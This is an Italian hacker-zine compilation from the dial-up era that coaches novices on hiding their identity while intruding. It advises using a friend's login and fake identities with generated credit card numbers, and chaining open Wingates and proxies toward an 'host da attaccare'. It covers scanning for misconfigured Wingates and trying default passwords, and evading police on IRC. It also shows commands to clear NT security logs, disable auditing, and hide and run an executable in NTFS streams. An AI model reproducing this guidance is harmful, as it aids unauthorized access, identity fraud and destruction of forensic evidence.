Ci sono, però, anche dei rischi nel "nascondersi" in questo modo. 


Il provider che fornisce l'accesso a internet, si potrebbe accorgere che due persone sono collegate 
nello stesso momento (tutto ciò si può verificare se entri nello stesso momento di XXX)! In questo 
caso il provider potrebbe cambiare la password di XXX e controllare ogni tua mossa! 


Quindi è consigliabile entrare con il login dell'amico solo durante ore improbabili. Per esempio la 
mattina presto o di notte...l'importante è che non sia un orario che coincida con XXX!!! 


Un consiglio: cerca di sceglierti un "amico" spilorcio che si colleghi poco ad internet! 


Un altro metodo è quello di crearsi una identità falsa attraverso i provider! In questo modo potrai 
navigare sotto il nome di "gigi" invece che il tuo vero nome. Ci sono dei programmi che ti creano una 
Id completa in tutti i minimi particolari, compreso n° di carta di credito e codice fiscale. 


E' importante anche oscurare il tuo Ip, per esempio utilizzando "wingate" (che puoi trovare in 
http://theskulls.tsx.org) o programmi simili! 


Quando ti crei una Id cerca di trovare un nick originale (cioè se ti chiami Gianni, non metterti come 
nick Gianni o cose simili) e sceglierti una password che solo tu puoi sapere! E' inutile scegliersi 
come nick "Sheva" e mettersi come password "milan" perché altrimenti sei fottuto! 


E' importante anche che tu non riveli a nessuno l'identità che utilizzi in internet!!! 


Inoltre cerca di mandare solo messaggi criptati via e-mail, per esempio utilizzando top secret per 
scrivere in codice il messaggio e utilizzare Anony Mail per inviare i messaggi! (tutto questo lo trovi 
nella mia Home Page) 


x 


Anche se hai creato una identità falsa è importante non tralasciare degli indizi che potrebbero 
fregarti nel futuro! Se qualcuno ti contatta in chat, evita di rivelare troppi particolari di te: per 
esempio che macchina hai, il tuo aspetto fisico, il tuo NOME (sei un deficiente se credevi di poterlo 
fare), i tuoi hobby ecc... 


A queste domande potrai rispondere ma logicamente dicendo il falso!!! 


Inoltre evita di tenere i tuoi dati personali, le tue password ecc... nel tuo Hard Disk, perché il 
computer sembra il luogo ideale per contenere database ma è anche il luogo più insicuro!!! Eventuali 
attacchi virtuali (tramite netbus e simili...) ti potrebbero recare danni e potrebbero fare il giochino del 
signor XXX con te!!! Questo non sarebbe molto simpatico!!! | tuoi dati ecc... è più sicuro metterli in 
Cd o Floppy, ma anche lì non siamo al 100% di sicurezza. 


Il posto ideale per tenere i tuoi database è il CERVELLO!!! Questo poco ma sicuro!!! 


Se non hai cervello (cioè sei un deficiente) cerca almeno di mettere un minimo di protezione al tuo 
Hard Disk. Per esempio metti una password al Bios o una password a Windows (ma sappi che non è 
difficilissimo farti saltare tutte le protezioni!) 


Inoltre quando elimini file un po' compromettenti, utilizza un programma come Kremlin che consente 
di cancellare definitivamente dei file...non come la pattumiera (il cestino) di Windows! 


Credo di aver detto tutte quelle cose fondamentali per rimanere anonimi nella grande rete! 


E ricorda: "SCHEDATI SI NASCE...ANONIMI SI DIVENTA" by Harry Caul. 


ANONIMATO IN RETE 


Prima di effettuare qualsiasi operazione e'necessario sapere come nascondersi 
nella Rete. Questo non garantira' l'anonimato completo, ma rendera' piu' 
difficile il compito di chi deve trovarci. 

In questo articolo, esplicitamente rivolto ai newbbissimi, prenderemo in 
considerazione tutti i passaggi di una connessione Internet, dalla chiamata 
telefonica ai diversi "rimbalzi" sugli host della rete. 

Prima di effettuare qualsiasi tipo di "esperimento" consiglio di leggere 
completamente il documento, compresa la sezione "Pericoli". 


0x00.1 CLI & BIC 

Dove CLI sta per "Caller Line Identification" e BIC per "Blocco identificazione 
chiamante". Chiaramente stiamo parlando del collegamento telefonico. Il primo 
passo verso Internet e' la connessione dial-up con l'ISP (Internet Service Provider) 
Da alcuni mesi e' disponibile anche in Italia il CLI, ovvero l'invio del numero 

del chiamante; questo significa che chi riceve la vostra chiamata e' in grado 

di vedere in tempo reale il numero del chiamante. 

Per evitare che questo avvenga, e' disponibile il "Blocco identificazione chiamente", 
che disabilita (parzialmente) questa possibilita". 

Mettendo il numero 1793 (0 *67#) davanti al numero da chiamare, si inibisce 

la possibilita' di visualizzare il nostro numero sul display del ricevente, 

ma non l'invio dello stesso alla centrale Telecom; questo significa che 

comunque sui tabulati della telco sara' registrata la telefonata dalla vostra 

utenza all'ISP, quel giorno a quell'ora... 


0x00.2 Account falsi 

Scenario: voi state "hackerando" con l'account dell'abbonamento che vi hanno 
regalato; vi siete registrati con il vostro nome (Mario Rossi) e vi siete 

collegati al computer del Pentagono... il sysadmin si accorge di un ip strano 
collegato al sistema (il vostro ip!), esegue un traceroute sul vostro ip, 

prende nota del penultimo hop e si collega sulla porta 79 di quell'host 

(il vostro gateway): 

users online 

mrossi@tin.it 212.216.200.123 

Mezz'ora dopo l'FBI e' a casa vostra e suona il campanello... 

Questa storiella ci insegna che non e' buona abitudine hackerare con l'abbonamento 
che abbiamo registrato con il nostro nome e i nostri dati anagrafici. 

Da quando sono nati i free-internet provider (Libero, Tiscali) la situazione e' 
alquanto migliorata (non che prima fosse fosse molto piu' complicata...); si 
possono creare fake-account a volonta', utilizzando un generatore di 
identita'(tipo quello di Cavallo de Cavallis). 

Naturalmente per effettuare l'abbonamento on-line, si dovranno rispettare alcune 
regole auree: una l'abbiamo gia' vista, ovvero la "disabilitazione" del CLI 
mettendo il numero 1793 prima del numero da chiamare, l'utilizzo di proxy. 


0x00.3 Proxy 


Uno dei problemi principali del newbie e del wannabe e' come nascondere o 
cambiare il proprio ip durante la navigazione o per entrare in IRC. 

I browser (Explorer, Netscape) prevedono l'uso di "proxy", ovvero computer che 
si frappongono tra noi e il resto della rete; quando cerchiamo di recuperare 

una pagina sul web, il nostro browser contattera' il proxy, e sara' quindi 
quest'ultimo a "prelevare" il documento html e a inviarlo a noi; vantaggio di 
questa operazione e' che l'ip loggato dal server di destinazione (dove 

abbiamo prelevato la pagina) sara' quello del proxy e non il nostro. 

Attenzione pero': non tutti i proxy sono anonimi. Questo significa che in alcuni 
casi il proxy lascia "filtrare" il nostro ip reale che restera' nei log del 

server. Prima di usare un proxy, ci si doverebbe sempre assicurare che si tratta 
di un proxy anonimo che non rivela il nostro ip. Questo testo puo' essere 
effettuato collegandosi a http://www.anonymizer.com/snoop.cgi, una pagina 

che fa un test sul grado di anonimato del nostro sistema. 

Comunque anche utilizzando un proxy anonimo non vi dovete sentire sicuri, anzi. 
Sarebbe opportuno concatenare due o piu' proxy prima di collegarsi al vero 
obbiettivo. Come ? Innanzitutto questa tecnica funziona solo con alcuni tipi 

di proxy, i Delegate; quando avete trovato alcuni Delegate, dovete mettere 

nella barra del browser la seguente stringa: 
http://proxy1.url:port/-_-http://proxy2.url:port/-_- 

dove proxy1,proxy2 e proxy3 sono gli indirizzi dei proxy Delegate che avete trovato. 
Ricordate: piu' proxy mettete, piu' diminuiscono le probabilita' di essere 
rintracciati, ma aumenta anche il tempo di latenza, rallentando la 

navigazione. 

Ma anche i proxy loggano... 


0x00.4 Socks 

Nelle reti protette da firewall gli host interni entrano in Internet attraverso 

un servizio speciale: Socks. 

Questo protocollo la cui porta di default e' la 1080, permette alle applicazioni 
che lo supportano di collegarsi a Internet in modo indiretto, con il firewall 

che fa da tramite. Il principio e' lo stesso del proxy per http, ma il range 

di applicazioni e' piu' vasto. In pratica ogni applicazione che supporta Socks, 
puo' collegarsi a Internet tramite Socks. Il vantaggio e' come al solito che 

l'ip che appare non e' piu' il nostro ip reale, ma quello del firewall; inoltre 

nuke & DoS vari del lamer di turno saranno diretti al firewall, lasciando 

del tutto indifferente la nostra macchina! 

L'utilizzo dei Socks e' classico nel mondo di IRC, ma puo' essere utilizzato 
anche con altre applicazioni; Volete proprio usare il Netbus? Ok, ma almeno 
non fatevi beccare subito con il vostro ip vero... usate un Socks. Volete 

fare del port-surfing manuale con il Telnet? Usate Socks... 

Certo, non tutti i programmi prevedono l'uso di Socks (per esempio, il Telnet di 
serie di Windows non lo supporta), ma grazie a un programma tipo SocksCap si 
puo' fare in modo che TUTTI i programmi di rete (compreso il Telnet standard di 
Windows) possano collegarsi in modo "anonimo". In questo modo e' possibile 
anche inviare email tramite Outlook o Eudora senza la paura di esporre il 
nostro ip reale, ma quello per esempio di un computer del governo di Taiwan... 


0x00.5 Wingate 


Wingate e' un porgramma per Windows che permette di collgare piu' macchine 
tramite una sola connesisone Internet, tramite le funzioni di proxy http, 

Socks, proxy ftp, telnet... 

In Internet si trovano molti Wingate mal configurati che permettono l'accesso 
anche a utenti non autorizzati (noi!). Il meccanismo e' quello visto il precedenza 
per i proxy e i Socks (ovvero l'ip che viene lasciato in giro e'quello del 
Wingate e non il nostro), ma ha una modalita' di utilizzo diversa. 

Lanciate il Telnet e collegatevi alla porta 23 del Wingate, se tutto e' Ok 

avrete un prompt del genere: 

Wingate> 

a questo punto mettete l'indirizzo dell'host al quale vi volete collegare, segutio 
dal numero di porta: 

Wingate>bill.whitehouse.gov 23 (Naturalmente sto scherzando: lasciate stare i 
.Q0V...) 

a questo punto il vostro ip e' al sicuro (relativamente, come sempre). 

Anche nel caso dei Wingate e' buona norma concatenare piu' Wingate tra di 
loro, cosi: 

quando avete il prompt del Wingate (Wingate>) inserite l'indirizzo di un altro 
Wingate,e poi un altro... infine l'indirizzo dell'host da attaccare. 

Certo aumenta il lag, ma e' sempre meglio che andare in galera... 


0x00.6 Trovare Proxy, Socks & Wingate 

Altro problema annoso del novello "hacker": dove li trovo i proxy & i Wingate ? 
Esistono diversi modi per procurarsi questi indirizzi. Il piu' immediato 

(e il meno redditizio) e' quello di andare su uno di quei siti che pubblicano 

liste di proxy e socks (proxy4all.cgi.net, la sezione apposita in 
www.cyberarmy.com e altri...). Il problema e' che questi proxy durano pochissimo 
o non funzionano affatto... Conviene arrangiarsi in altro modo. 

Procuriamoci uno scanner e lanciamolo in giro x la rete, prima o poi qualcosa 
troviamo. 


Per informazione, le porte su cui trovare qualcosa sono le seguenti: 
8080 proxy http 

3128 proxy http 

81 proxy http 

1080 Socks 


Un altro modo efficace x trovare Socks e' quello di entrare in IRC e dare il 
comando 

/stats k 

per avere la lista dei k-line, ovvero la lista di host "bannati". Molti host 

della lista saranno Socks bannati da quel server ma perfettamente funzionanti 
x altri scopi! 


Siete pigri e non avete voglia di cercare? Aspettate che i Socks vengano a voi! 
Lanciate il Nukenabber e navigate tranquillamente (oppure andate su un canale 
molto frequentato in IRC); Alla fine della serata date uno sguardo al log del 
Nukenabber: tra i vari tentativi di lamer con BO & Netbus, forse ci sara' anche 
qualche indirizzo di Socks utilizzabile... 


Altre tecniche potete trovarle nel mio articolo "Gabole nella Rete", reperibile 
sul mio sito e sul numero 0 di "Lightz". 


0x00.7 Pericoli 

Per iniziare bisogna dire che NESSUNA tecnica qui esposta garantisce l'anonimato 
assoluto, esiste sempre un margine di pericolo. 

Dal momento della connessione dial-up con il provider alla connessione tramite 
TCP/IP in Internet, lasciamo un mare di tracce ovunque. 

La compagnia telefonica ha sempre e comunque il nostro vero numero, anche se 
usiamo il BIC. I vari proxy che usiamo molto probabilmente (anzi, sicuramente) 
loggano tutto il traffico, cosi'come i Socks: forse c'e' qualche speranza con 

i Wingate. Assolutamente da evitare gli host "boservizzati" o cmq "trojanizzati". 
Forse il metodo piu' sicuro e' quello di essere root su di un sistema e avere la 

la possibilita' di "ripulire" per bene i log. 

Da non dimenticare poi la possibilita' di mettere nei guai gli ignari possessori 

di host compromessi (ancora una volta: trojan e backdoor varie) o i responsabili 
dei sistemi che usiamo per "rimbalzare" (Wingate, proxy...). 


SERVER PROXY 
Cos'è un server proxy ? 


Un server proxy è un server che qualcuno (a volte l'internet provider, a volte un amico) ha settato in 
modo che quando tu ti colleghi a un sito il proxy ti fà fare una deviazione e prima di arrivare al sito 
passi attraverso il proxy e poi dal proxy vai al sito. 

Così se qualcuno vuole visitare il sito che hai visitato tu e usa il tuo stesso proxy non visiterà il sito, 
ma riceverà il contenuto dal sito dal proxy. 

Spesso qualcuno (in genere l'amministratore) setta il server proxy [ scusate le ripetizioni, però.. ] in 
modo che ogni tot di tempo le pagine web contenute nel proxy vengano aggiornate. 

Ogni volta che viene visitato un nuovo sito questo viene salvato sul proxy. 

A volte può capitare che sia una persona a determinare quando un sito contenuto sul proxy và 
aggiornato. Infatti se un utente crede che il sito abbia bisogno di un update e ha bisogno di essere 
aggiornato il contenuto sul proxy basta che questo utente clicchi su "Refresh" o "Reload" [ nelle 
versioni italiane "Aggiorna"] sul suo browser e il sito verrà aggiornato sul proxy. 


Perchè usare un server proxy ? 


Ci sono diversi motivi. Molti internet provider lo usano perchè "taglia" il volume del traffico sui 
loro network e fanno viaggiare più veloci i loro utenti. 

Gli utenti lo amano perchè li aiuta a rendere più difficilmente rintracciabili le loro tracce sul web. 
Questo in particolare se gli utenti usano più proxy, anche 3, contemporaneamente. Sarà difficile 
trovare 3 server che loggano ogni attività. 

Altri utenti lo amano perchè la loro connessione è resa più veloce, specialmente se visitano server di 
altri continenti. 

NOTA: E' una buona cosa cercare in giro i proxy tramite cui collegarsi. Se usate un proxy della 
Microsoft ( M$ ) infatti è probabile che ogni vostra attività verrà loggata 

Se è anonimo oppure è un proxy chiamato di "uso pubblico", usalo pure. 


Cos'è un Wingate ? 
UNA definizione officiale che ho sentito dire da numerose persone è: 


"Un Wingate è un server proxy firewall software che permettere di condividere una singola 
connessione a internet con altri computer del network. [ad esempio i Netcafè, dove più computer 
sono connessi tramite un singolo abbonamento internet]. 

Una connessione internet condivisa da un wingate può essere di vari tipi, inclusi dial up modem, 
ISDN, xDSL (l'autore voleva forse dire ADSL ?), modem cablati, connessioni satellitari, o tutti i 
circuiti dedicati T1." 

Un wingate quindi è simile a un server proxy. Connette diversi computer attraverso la porta 23 di un 
computer, che sarà chiamato wingate. In pratica è semplicemente una connession di telnet. 

I wingate dovrebbero essere usati per avere accesso alla rete interna o per essere collegati tramite di 
essi a un sito. 

Spesso i wingate sono settati male a causa delle lacune degli amministratori e ci sono un sacco di 
wingate che permettono a chiunque di collegarsi tramite essi a internet, aprendo una strada a l'ip 
spoof su ICQ o su IRC per fare abusi di qualunque tipo. 

Questi wingate configurati male sono chiamati "Open Wingate" e in genere restano attivi da un paio 
di giorni fino a parecchio mesi, fino a quando l'amministratore si accorge dell'uso che viene fatto 
del wingate o fino a quando qualcuno lo usa per scopi illegali. 


L'unico benificio che un amministratore ha dall'abilitare un wingate è quello di poter usare un 
singolo abbonamento internet per collegare in rete più computer. Ma i problemi che possono 
sorgere dall'installazione di un wingate sono maggiori dei benifici. Se qualcuno sta per settare su un 
suo computer un wingate consiglio prima di sapere esattamente ciò che si sta facendo ed essere 
sicuri di come configurare in modo sicuro il wingate. Un software per rendere il proprio wingate 
sicuro è SyGate. 


Dalla mia esperienza come amministratore di sistema e utente remoto possono dirvi che i log di 
molti wingate vengono cancellati ogni 48 ore. 
E molte aziende e internet provider non loggano tutto quello che succede sui loro wingate.. 


Come trovo un wingate ? 


Bella domanda. Il miglior modo è ascoltare la voce del popolo [ascoltate insomma i discorsi su irc e 
troverete qualcosa]. Se questo metodo di ricerca fallisce, il secondo miglior modo è quello di usare 
uno scanner di wingate. 

Potete scannare numerose sottoreti alla ricerca di wingate. Una nota: i network nei paesi del terzo 
mondo, nell'estremo oriente, in Africa, ecc.. hanno una cosa in comune: hanno wingate configurati 
malissimo e ci sono centinaia di "Open Wingate" sulle loro reti. 

Provate a fare scanning di queste reti e vedrete.. 

Per controllare che il wingate non abbia password collegatevi ad esso tramite telnet alla porta 23 e 
quando richiede user name & password non scrivete niente e se entrete nel wingate ne avrete 
trovato uno. 

Se il wingate invece richiede delle password provate: 

wingate (sia come ID che come password) 

guest (sia come ID che come password). 

e forse ( FORSE ) vi verrà dato l'acceso.. 

Il miglior scanner per Windows ( 32 bit ) che ho usato è: wGateScan v2.2 

Lo trovate su molti siti. Io l'ho trovato su http://www.hotmanscave.com/ 


Per usare wGateScan v2.2 tutto quello che avete da fare è inserire il range di ip (o l'hostname) da 
scansire. Lui si telnetterà alla porta 23 e spedirà un messaggio che dice "wingate" o qualcosa di 
simile. Se l'host accetterà il messaggio allora bingo ! Ne avete trovato ! 


Wingate con ICQ: 


Per configurare ICQ in modo che lavori con un Wingate 
attenzione, il txt proponeva una procedura diversa, io riporto la procedura per ICQ 99A e (spero) 
successivi). 


Per configurare Icq in modo che lavori con un wingate: 


Wingates with ICQ: 

Cliccare il tasto ICQ 

Cliccare Preferences 

Selezionare la voce "Connection" 

Selezionare l'opzione "I'm using a permanent internet connection (LAN)" 

Adesso selezionare la voce "I'm behind a firewall or a proxy" 

Cliccare su Firewall Setting 

Scegliere tra "I'm using a SOCKSA server" e "I'm using a SOCKSS server" (dipende dal wingate, 
provatele entrambe e guardate quale delle due funziona) e poi cliccate Next 


Se avete selezionato SOCKS4: nella casella SOCKS4 Host scrivete l'ip del wingate e come 
porta lasciate pure la 1080 e sotto selezionate "Open an outgoing UDP port 4000 on my 
firewall". 
Cliccate Next e poi cliccafe "Check my Firewall/Proxy setting"... Se avete configurato 
tutto per bene dovrebbe essere possibile selezionare il tasto Next e.. Avete configurato il 
vostro SOCKSA. Se non provate a cambiare la voce "Open an outgoing UDP port 4000 on my 
firewall" in "Use a mapped port on proxy" e completate la tabella sotto quella voce con 
l'indirizzo di un proxy e la porta su cui lavora (in genere 80) 


Se avete selezionato SOCKSS5: scrivete nelle relative caselle l'ip del wingate e come 

porta lasciate pure la 1080. In caso il wingate abbia bisogno di password selezionate 

anche la voce "Use RFC.......for SOCKS" e completate con Username e password. 

Cliccate Next e poi cliccafe "Check my Firewall/Proxy setting"... Se avete configurato 

tutto per bene dovrebbe essere possibile selezionare il tasto Next e.. Avete configurato il 
vostro SOCKS5 


Wingates con IRC: 


Per configurare il vostro client IRC [per Win il più usato è mIRC (www.mirc.co.uk), per Linux è 
xchat] dovete semplicemente selezionare la voce "Firewall" (c'è in tutti client !!) dire se si tratta di 
un SOCKS4 o un SOCKSS5 (come detto prima dipende dal wingate, se non và uno provate l'altro) e 
inserite l'ip del wingate. Se servono delle password compilate i relativi spazi bianchi e via.. 

Dato che ci sono decine di client IRC sarebbe troppo lungo spiegare la procedura di ognuno, quindi 
ho messo un percorso generale che dovrebbe valere per tutti. 


Bottom Line [modo di dire che mi pare significa "Considerazioni Finali"] 


Socks/Wingate and Proxy posso aiutarti a rendere la tua identità più difficile da trovare e loggare in 
internet, spesso lo fanno in maniera completamente legale. Ma non pensate mai "Non risaliranno 
mai a me" anche se passate per numerosi proxy, wingate o sock. 

Ricordate che chiunque può risalire all'ip originale e al proprio Internet provider. 


COME DIFENDERSI DALLA POLIZIA TELEMATICA 


E' realmente possibile incrociare sbirri telematici 

durante le proprie orde su IRC o su spazi WWW o ...insomma è realmente 
presente la polizia telematica?? Questo è poco ma sicuro... infatti la 

polizia telematica, ed in particolare quella italiana, più che presente 

oserei dire che è onnipresente sulla rete... o meglio "on the net", questo 
putroppo non è stato un ingresso graduale e ragionato, ma per lo 

più una vera e propria presa di posizione in seguito ai numerosi casi di 
pedofilia via internet accaduti in Italia negli ultimi 2 anni. 

Questo ancora una volta mostra la stupidità ed ignoranza dello Stato nei 
confronti delle ultime tecnologie (leggi... internet). 

Se siete dei malati di IRC avrete sicuramente parlato, a vostra insaputa, 

con una poco probabile Manuela o Monica, ed un certo "sbirro". Proprio così 
spesso e volentieri per attaccare bottone con presunti hackers e quindi così 
come la vedono loro sicuri truffatori telematici, camuffano i loro nicknames 
con quelli di dolci venere o simili. Altrimenti se mantengono nicknames 
maschili si fanno passare per dei principianti in cerca di ganci o cagate 
simili. Quindi una prima buona regola da adottare potrebbe essere quella di 
crearvi un account di posta via WWW tipo hotmail o bigfoot con un forward 
alla vostra vera casella di posta, così da poter tranquillamente mollare ai 
vostri "conoscenti" un indirizzo di posta non personale. Vediamo meglio con 
un esempio pratico cosa intendo dire: Supponiamo che stai chattando su 
#hacktheworld, d'improvviso ti appare una richiesta di chat privato da parte 
di un certo X-Wolf (ndr. minchia che fantasia), penserai: "che culo... su un 
canale internazionale un italiano, mò gli chiedo un pò di cosine". 

Così comincia la chiacchierata, lui ti dice che è un gran bastardo, ti 

propone un innocente scambio di shells, ti dice che ha dei numeri di carte di 
credito e che ne vuole ancora, che compra / vende CD masterizzati e cazzate 
simili... insomma ti sembra un buon gancio, allora che fai?? gli lasci la tua 
mail: 61fesso@tin.it, lui ti lascia la sua: 1furbo@usa.net. 

Passano un paio di settimane (ndr. anche meno)... nel frattempo avete iniziato 
una secca corrispondenza dove tu ti vanti dei servers bucati e spari a nastro 
sul fatto che hai un amico col masterizztore che vende CD a prezzi stracciati, 
etc... una sera lo ribecchi sul canale... "finalmente posso parlarci in 

diretta"... ALT!! dal momento che gli hai lasciato la mail nel giro di 

qualche ora sanno tutto di te, come ti chiami, dove studi o lavori, dove 

abiti, il tuo conto bancario... insomma ti hanno fotografato. 

Dopo circa 24h. se vedono che sembri essere un "bastardo" e credono a quello 
che hai scritto nelle tue mails decidono di farti pedinare e richiedono 
maggiori informazioni anche a livello strettamente personale. Dal momento in 
cui lo rivedi su IRC loro sanno già tutto su di te... mentre tu probabilmente 
non sai un cazzo di lui... anche xchè non ti 6 messo a controllare la sua 

mail o il suo IP... anche se devo dire che in questo sono molto attenti e 

furbi. Tu ignaro di tutto continui a tirartela, gli passi info... 

lui pure xchè no?? e allora?? come va a finire?? 

Supponiamo che della metà delle cose che hai scritto solo una parte è vera... 
che non hai sfondato nessun server, ma le shells te le ha date un amico, che 


non hai un amico che masterizza "in piazza" ma lo fa solo a livello amatoriale, 
etc... forse forse se constatano tutto ciò ti mollano senza troppi indugi, 

mentre se hanno anche solo il minimo sospetto che puoi essere il collegamento 
ad un "pesce grosso"... bhe... nelle migliori delle ipotesi tutto inizia con 

una semplice convocazione presso la questura... nelle peggiori ti svegliano 

alle 5.00 di mattina e ti sequestrano tutto!! Magari 6 un piccolo moccioso 
bastardo che vuole fare il Kevin Mitnik della situazione ma loro o non 

l'hanno capito oppure non gliene frega un cazzo... e quindi ti martellano 

fin quando gli pare e piace. Con ciò ci tengo a sottolineare che anche se non 

si fa nulla di male... è sempre meglio tenerli a bada certi spaccameloni!! 
Allora xchè non crearsi dei fake account, mail, etc... in modo da depistare 

o per lo meno limitare le ipotesi di essere identificati ?? 

Io x esempio navigo solo attraverso proxy anonimi (www.anonymizer.com anche 
se c'è ne sono di più veloci) ed uso un programmino stupido x cambiare in 
modo random e del tutto fantasioso i miei cookies, le mie mails fanno dei 

giri spaventosi, vengono girate a destra e manca, e prima di raggiungere il 
server POP vero e proprio capita che passano da 6 o 7 remailer... anonimi e 
non, mentre su IRC o mi appoggio a proxy socks anonimi, oppure non mi lancio 
in dichiarazioni alla Raoul Chiesa, infine controllo sempre con chi ho a che 
fare, il più delle volte ottengo nome, cognome e telefono dei miei 
interlocutori... insomma la prudenza non è mai abbastanza. Certo che non 
faccio nulla di male, ma vaglielo a spiegare a certi ignoranti bastardi che 

ti registri le shareware xchè le nags ti mandano in bestia e non lo fai x 
rivenderle... o che il CD masterizzato ti serve x tenere tutto su di un 

unico supporto piuttosto che 200 dischetti e 3 ZIP, solo x comodità... 

vaglielo a spiegare!! 


Ricapitolando: 

1) crearsi una struttura di remailing, x esempio il mio vero indirizzo di 
posta è skilled@mbox.xcom.it, bene... di certo non lascio questo in 
giro... mi creo un account fasullo su Lycos che forwarda le mails sul mio 
indirizzo reale. Poi ne creo un altro fasullo su Yahoo, che forwarda il 
tutto a quello di Lycos. Poi ne creo ancora un altro su Hotmail che 
forwarda il tutto a quello di Yahoo. Non ancora contento lo faccio passare 
ancora su Usa.net... insomma alla fine le vostre mail faranno un giro 
pauroso, certo arriveranno con un pò di ritardo, ma arrivano... questo è 
poco ma sicuro. Questo per le mails in entrata, mentre per quelle in 
uscita basta semplicemente appoggiarsi ad un server SMPT anonimo... basta 
cercame uno da Altavista, oppure date un'occhiata all'elenco proposto da 
Anonymizer, ovviamente di tipo II, quindi MixMaster e compagnia. 

2) quando navighi apoggiati a dei servers proxy anonimi, tanto x citarne 
qualcuno Proxy4All (l'url non me lo ricordo, comunque il buon Altavista 
è in grado di trovarlo). 

3) Non spacciarti troppo su IRC, rircordati in ogni caso di cucirti la 
bocca e sviare il discorso se un interlocutore che non conosci o 
conosci da poco ti propone/chiede CD masterizzati, carte di credito, 
generatori di numeri di carte di credito, shells che ti sei procurato 
diciamo in modo non regolamentare. Ah quasi dimenticavo... se ti parla 


di foto di bambini/e allora hai a che fare con un bastardo rottoinculo 
di pedofilo, mandami una mail che ci penso io a dargli una bella lezione! 


Comunque detto ciò, dopo un'attenta riflessione e dall'alto dell'esperienza 
che mi logora il posto dove i pulotti preferiscono sostare è sicuramente IRC, 
quindi meditate gente... meditate. 

ciao da Skilled... buon anno a tutti i pulotti di #cybernet ;-) 


COME OCCULTARSI IN WIN NT 


Tratterò due argomenti I LOG e CELARE DEI FILEZ. 
< LOG > 


Allora i sitemi di "log" su NT posso essere vari ecco i + conosciuti : 
-EVENT LOG 
-AUDIT 


NT crea il suo bel file di log sotto %systemRoot%\system32\config. 
I files hanno estensione evt (SecEvent, AppEvent,SysEvent). 


EVENT LOG 

Un possibile modo di "fare le pulizie" è utilizzando l'Event Viewer, ma NON 

FATE "CAZZATE" ,perchè se lo modificate comparira nel event log che è avvenuta 
una modifica... quindi e come dire : "ehi sei stato hackkato" 


Qui ci vengono in aiuto altri programmi come elsave che permette (se si hanno 
le giuste autorizzazioni ) di ripulire tranquillamente il Security log. 


elsave : www.ibt.ku.dk/jesper/ (sotto la sezione NT tools) 


AUDIT 

Da qui si capisci che tipo si sysadm si ha di fronte se capisce qualkosa 
l'auditing sarà attivato se invece pensa : "a che mi serve, mi rallenta solo 
il sistema" potete intuire il suo quoziente intellettivo..... 

Questo registra (in base a come è impostato) delle nostre azioni, è this 
isn't good. :)) con auditpol (viene dal Resource kit) è possibile 
disattivarlo e riattivarlo dopo avere finito, con le impostazioni precedenti 
(non bisogna saperle ci pensa auditpol a conservarle. 


i comandi sono —X:\>auditpol /disable 
e per riattivarle /enable 


< NASCONDERE I FILE > 
Voi dite : beh si fa attirib +h [pizza] però se l'opzione "Mostra tutti i 
file è attivata" non serve a niente... 


To rispondo: beh, se lo sapete, cosa lo dite a fare ???? :))))) 


Allora ho procedete che la classica tattica di dare ai file nomi finti di 
sistema o fate.... 


Lo Streaming dei file di NTFS 


SE nel sistema è installato il NTFS (NeTwork File System) possiamo usare il 


seguente metodo. Prendiamo un qualunque file. Ad esempio ciao.001 (ehi non 
questo, uno che esiste ) . Ora creiamo uno stream(*/1) usando cp(*/2). 
Procediamo : 


cp cattivo.exe ciao.001:cattivo.exe 

Ok fatto, se ora vogliamo estrarre il file facciamo... 

cp ciao.001:cattivo.exe cattivo.exe 

Una volta svolto lo stream la data di modifica di ciao.001 cambia, ma non la 

sua dimensione !! :) 

Per questo un file stram è difficile da trovare. Il file nascosto puo essere 

eseguito senza essere estratto (NON CON CMD.EXE) ma utilizzando il commando 
start 

start ciao.001:cattivo.exe 

*N1 = stream: meccanismo per aggiungere attributi ad un file senza 


ristrotturare il file system. 
*N2 = cp: è l'utilità POSIX presente nel Resource Kit di WIn.NT 


I FIREWALL 


Per Firewall si intende un sistema o un gruppo di sistemi il cui scopo 

e' quello di filtrare il traffico tra due reti differenti, cioe' 

implementare una politica di controllo degli accessi. I Firewall sono 
ormai molto diffusi nelle grandi corporation e nei vari centri di 

ricerca, soprattutto quelli di tipo governativo...dovunque ci sia 

qualcosa di riservato state sicuri di trovare un firewall..:-)). E' 

pratica molto comune utilizzare i Firewall come "vetrine" in cui 
mettere materiale che debba essere reso pubblico (basti pensare alle 
varie patch e upgrade resi disponibili dalle varie corporation): il 

lato "positivo" di questa pratica e' data dal fatto che tutti i vari 

ospiti del sistema rimangono fuori dalla rete interna vera e propria, 
visto che il Firewall crea una sorta di compartimento a tenuta stagna 
con il mondo esterno. Un Firewall puo' essere configurato diversamente 
a seconda delle esigenze di sicurezza a cui deve fare capo: alcuni 
Firewall lasciano passare in entrambi i sensi solo messaggi di posta 
elettronica, altri, piu' sofisticati bloccano il traffico proveniente 
dall'esterno ma non pongono nessuna limitazione a quello proveniente 
dall'interno. Questi simpatici gingilli sono utili anche nel caso in 

cui il sistema e' attaccato via modem; in questo caso il Firewall puo' 
ricoprire il ruolo di investigatore, nel senso che se opportunamente 
configuato puo' implementare delle funzioni di logging (e fin qui 

nulla di speciale) e soprattutto delle funzioni di tracciamento della 
chiamata, cosa abbastanza improbabile nel caso di un Firewall made in 
Italy ma MOLTO piu' probabile nel caso di uno made in USA, in quanto 
il sistema telefonico USA permette agevolmente di sapere il numero del 
chiamante (tramite la funzione CALLER ID); in Italia questo e' 
possibile solo nel caso di linee ISDN e sistemi GSM (anche se non in 
maniera uniforme, ma qui svicoliamo in un altro argomento..). Un altro 
aspetto da tenere in considerazione riguarda il livello di sicurezza 
globale della rete "target": e' inutile acquistare un Firewall 

costosissimo e poi ignorare tutte le altre possibile back-doors: 

un Firewall dovrebbe rispecchiare il livello globale della rete. 

Questa banale regola nella maggior parte dei casi fortunatamente non 
viene presa in considerazione...:-9 Se poi esistono particolari 

esigenze di riservatezza e sicurezza la prima regola da seguire 

dovrebbe essere questa: NON collegarsi in Rete!!:) Sembra banale ma e' 
l'unico modo per garantire una sicurezza prossima al 100%..se poi uno 
accede alla rete fisicamente...beh..chiamate un fabbro e fate mettere 

un paio di serrature in piu'..8-)) Fondamentalmente esistono due tipi 

di Firewall: 


* Network Level 
* Application Level 


Le differenze tra i due sono molto meno marcate di quanto si potrebbe 
pensare, ed anche in termini di giudizio non e' possibile affermare in 
senso assoluto "quel tipo e' meglio di quell'altro"..tutto dipende 

dalle necessita' di sicurezza della rete. 


Un Firewall di tipo Network Level prende le sue decisioni basandosi 
sull'indirizzo sorgente, quello di destinazione e la porta di un 

singolo pacchetto IP, per il resto si comporta come un router normale. 
